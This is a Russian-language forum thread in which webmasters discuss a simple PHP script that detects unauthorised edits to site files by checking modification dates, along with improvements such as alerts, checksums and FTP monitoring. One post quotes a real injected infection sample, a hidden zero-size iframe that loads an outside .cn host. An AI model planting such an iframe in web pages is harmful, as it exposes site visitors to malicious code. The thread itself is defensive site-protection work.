Скрипт для "защиты" сайта от вирусов
 

D.iK.iJ - AntiWorm © версия 2.0 (архив 5 КБ)
Скрипт помогает защититься от вирусов на сайте.
Проверяет файлы на дату изменения.
Если файл вдруг был изменен без участия пользователя, выводится предупреждение.
Если файл изменил сам пользователь, нужно просто синхронизировать базу.

P.S. На странице - самый нижний скрипт. Распространяю бесплатно.

На моих сайтах скрипт установлен давно и с успехом работает. Единственное различие с данной версией - у меня установлена блокировка сайта при обнаружении каких-либо изменений без моего ведома.
Все желающие могут тестить. Может что-то хорошее подскажете...

Хочу внести 2 предложения по улучшению:

сделать так, чтобы при обнаружении изменения файла вебмастеру отсылалось письмо.

Сделать список для удаления файлов. Пример: встречал ещё такую штуку, вирь не только дописывает код в index.php, но и создает в корне файл index.htm, в результате чего при открытии сайта грузится левый index.htm с прописанными iframe. Т.е. другими словами чтобы скрипт проверял наличие подобного index.htm и убивал его при обнаружении.

Примечание:
 

Вредоносные скрипты на сайте очень часто располагаются на сайтах в виде Java скриптов или Фреймов.
Открывать такую странице через браузер - не безопасно для самого себя.
А вот через любой HTML анализатор - можно. И вполне удобно.

Кому нужно, вот мои.

Добавлено через 15 минут
С отправкой письма все очень просто. Достаточно в скрипт (файл avto.php) добавить при обнаружении изменений код
(после строки print "<font color='green'>OK!</font>";):
Думаю, переменные сможете заполнить и сами.

Подводный камень: от, отправляющий письма с сайта нужно занести в белый список.
Подводный камень 2: При обнаружении изменения, скрипт не блокируется на день.
Это значит, что при каждой загрузке проверочной страницы Вам будет приходить письмо => таких писемможет быть очень и очень много.


С этим сложнее. Если сайт полностью статический и в програму занесены ВСЕ файлы сайта, то вычислить посторонние еще можно.
На динамическом же сайте многие файлы создаются или меняются скриптами...
И они априори будут в зоне риска :(

Согласен. Но можно просто сделать второй список в котором будет то, что надо удалить при обнаружении. Т.е. если в корне сайта должен быть только index.php, то чтобы все остальные index.* удалялись..

Ну так сделайте индексной страницей только index.php, тогда index.htm грузи не грузи - толку ноль будет.

Это прописывается в хитачес.

О!!! В программе вбейте в базу все индексы: index.php index.html и так далее...
А в дату изменения поставьте любую "левую" дату.
Тогда если файл появится, программа выдаст ошибку - что данный файл был изменен.

Вуаля - вам придет предупреждение.

Добавлено через 3 минуты
Пример для config.dat:
/index.php|01.01.70|
/index.html|01.01.70|
/index.htm|01.01.70|
/index.xhtml|01.01.70|

Не забудьте оставить последнюю строчку пустой.

Плюсануть бы Вам репутацию, да больше пока не плюсуется)))))))
Спасибо!

Ну да и скриптов не нада никаких, процессор не кушается :)

Спасибо, на днях испробую :)

Буду рад узнать результаты

Буду ждать результатов :)
Вроде бы PHP скрипт достаточно простой...

удалить

Добавлено через 13 минут
НЕТ /index.php
NO
OK
OK
OK
OK
НЕТ /go.php
NO
OK
OK
OK
OK

/index.php
|01.01.70|
|15.09.08|
|15.09.08|
|15.09.08|
|15.09.08|
/go.php
|01.01.70|
|15.09.08|
|15.09.08|
|15.09.08|
|15.09.08|

Откуда берется |01.01.70|
Почему пишет НЕТ /**.php
И вообще что он проверяет я не пойму... скрипт расположден в папке /antiworm/
он проверяет корневой каталог?

можете скинуть пару примеров, зараженных участков кода.
Я вечером - ночью напишу скрипт ;)
Идея есть интересная )))
Просто у мну уже давно сайты не заражаются

<iframe src="http://orentraff.cn/in.cgi?8" width="0" height="0" style="display:none"></iframe>

Задолбало это :mad:

Давайте начнем с самого начала.
В папке /antiworm/ есть файл config.dat, который нужно открыть в Блокноте.
В файле вот такие пять строк:
Это - база страниц, по которой скрипт будет проверять дату изменения этих самых страниц.
Пока в базу занесен просто шаблон - проверка нескольких возможных индексных файлов в корне. А так как синхронизация еще не проводилась и дата изменения ваших файлов не известна, то вместо нее записано |01.01.70| - первое января 70 года :)

Соответственно, чтобы скрипт начал проверять Ваши файлы, измените список на свой. Пример:
После того, как нажмете на кнопочку синхронизации, вместо |01.01.70| в базу будет записана реальная дата изменения того или иного файла.
Соответственно, если файл вдруг изменится без вашего ведома - велика вероятность, что это сделал вирус.

Немного по сообщениям:
НЕТ - файла нет
OK - дата изменения совпадает с хранящейся в базе
NO - дата изменения файла не совпадает с базой.

Кнопка синхронизации служит для того, чтобы обновить даты в базе. Например, после того, как вы сами изменили какой-то файл.
Кнопки ON и OFF, думаю, интуитивно понятны.

D.iK.iJ
Спасибо, теперь всё работает :)

Добавлено через 6 минут
А проверка по времени файла нет? По дате файла не очень... время нужно... Вот проверка по md5 другое дело или crc32 ... да и каталоги бы проверял на появление новых файлов... можно?

Добавлено через 1 час 9 минут
Если какие то файлы из папки не прописаны нужно чтоб скрипт выдавал "неизввестный файл" и все файлы нужно проверять по md5... ща в этом скрипте толку очень мало Имхо...

У скрипта совершенно другое предназначение. Он просто должен сообщить о вторжении и все.

Действительно.
Когда пароли крали у меня, я в первую очередь жалел, что не сразу заметил приписку к коду в виде виря. (Хотя банально изменили только index.php.) И кто-то из зашедших на сайт пользователей мог подхватить на свой комп тот же вирус :(

А чтобы файл проверялся не только на дату, но и на время создания, думаю, нужно просто изменить:

$add=date("d.m.y",filemtime($_SERVER['DOCUMENT_ROOT']. "$dt[0]"));
$nastdate=date("d.m.y");

И подобные строки на то, что нужно именно вам ;)

АП! :D

Если бы я в этом еще что-то понимал... :D
Есть у кого-нибудь PHP для чайников? Объясните мне плиз, что делает этот код! (Я вполне серьезно). :p

Видимо это намек, чтобы скрип проверял оригинальный размер файла и и автоматически восстанавливал файл из бекапа.

А, спасибо :)
Исходя из того, что я учил PHP по WR скриптам, мои познания в нем что-то не очень велики ;)
А учитывая, что у меня на хостинге всего 50 "метров", вопрос с бекапом отменяется "автоматически".
Да и нормальный кодер на PHP напишет скрипт в разы лучше :rolleyes:

Ну, может другим пригодится) Да и чаще всего заражаются только индексные файлы ;)

Конечно пригодится!
Я вот что-то новое узнал о PHP ;)

[OFFTOP]а что такое WR скрипы? :rolleyes:[/OFFTOP]

Я по ним учу (и учил PHP) http://www.wr-script.ru/ (не сочтите за рекламу, сам наткнулся в Сети случайно).
Просто устанавливаю на сайт... а потом постепенно дорабатываю под себя. И в какой-то момент просто переписываю код заново :rolleyes:ъ
Так вот учусь разбираться в PHP.

тогда мот лучше не размер и/или время в базу вносить, а checksum через crc32()?
http://www.php.net/crc32

ещё если сайтов много, можно сделать для всех сайтов один скрипт проверки:
- заносим в БД (на том сервере, где скрипт) изначальные данные файлов каждого сайта
- коннектимся по FTP (на php реализуемо просто), проверяем данные
- если что-то изменилось, отправляем письмо админу нужного сайта (или одному админу всех сайтов), чтобы проверил, всё ли ок

Плюсы:
- если сайт ломанули, то не факт, что будет работать mail() в php (при взломе могут рассылать спам с этого сервера и хостер может автоматом отключать отправку почты для взломанного сайта), а вот FTP будет работать.
- всё в одном месте => не надо бегать по всем сайтам.
- поставить на cron и проверять все сайты раз в день (ночью например) или пару раз в день
и так далее...

Способ предложенный вами хорош, но это уже совершенно другой уровень защиты сайта и, как следствие, совершенно другие трудозатраты. Безусловно для некоторых серьезных проектов нужна защита, гораздо более надежная, чем простая проверка crc/size/time, однако для большинства небольших сайтов вполне достаточно и этого. Всё индивидуально вобщем)

А crc мне не подошло, поскольку не реально вставить в файл функцию самовосстановления этого самого файла путем сравнивая crc/md5 и прочего :)

ну конечно всё индивидуально. просто предложил развить идею - вот и всё ;-)

Тут вроде восстанавливается только один файл, сохраненный где нибуть как бекап.

Да, но функция проверки в скрипте предполагает цикл. Следовательно, восстанавливать придется все поврежденные файлы... ну, или немного переделать скрипт. :)
К тому же, где хранить бекап так, чтобы он был в безопасности? :confused:

В скрипте можно добавить код для блокирования сайта при обнаружении "неполадок" с файлами. Допустим, через изменение файла .htaccess.
Пример блокировки PHP файлов:
Также можно блокировать только один файл. :)